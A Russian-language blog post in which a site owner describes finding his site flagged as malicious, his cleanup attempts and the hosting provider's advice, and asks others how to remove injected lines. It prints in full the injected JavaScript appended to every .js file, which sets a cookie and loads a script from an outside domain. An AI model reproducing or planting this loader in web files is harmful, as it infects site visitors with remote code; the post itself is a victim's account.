Всем привет.

За последнюю неделю потратил много времени на восстановление работоспособности сайта.

В один «прекрасный» день перестали работать скрипты сайта, поисковые системы google и yandex нашли на сайте код который по их мнению атакует компьютеры пользователей. (См. изображение)

На самом деле так оно и было.

Сначала я просканировал сайт одним из бесплатных сервисов в интернете:

Как видно из скрина, у меня есть список файлов на которые ругается гугл. Вот их я и стал смотреть.

В итоге выяснилось, что во всех файлах с расширением *.js в самом низу прописан такой код:

function g(){var r=new RegExp(«(?:; )?1=([^;]*);?»);return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie=»1=1;expires=»+e.toGMTString()+»;path=/»;document.write(‘<script src=»http://mainscript.org/mainscript.js»></script>’);}

Видно, что в коде присутствует ссылка на сайт, который гугл не рекомендует посещать.

В интернете ничего не нашел по этому поводу, только одну статью о заражении файлов скриптов. Видимо это что-то новенькое.

Несколько раз возвращал копию сайта, но эти симптомы провторялись через день или два.

Хостинг поддержка посоветовала поменять все пароли: ftp, администратора сайта, пароль на web shell., а так же проверить все компьютеры с которых производилась работа с сайтов антивирусными программами.

Сейчас пока сайт работает…. Надеюсь это не повторится.

 Хочется отметить, что при входе на данный сайт на некоторых компьютерах так и пишется предупреждение. Связано это скорее с тем, что google еще не проверил заново сайт (повторную проверку я запросил в инструментах веб разработчика Google).

У кого были такие проблемы и есть решение, как удалять ненужные строки из js файлов прошу поделится знаниями…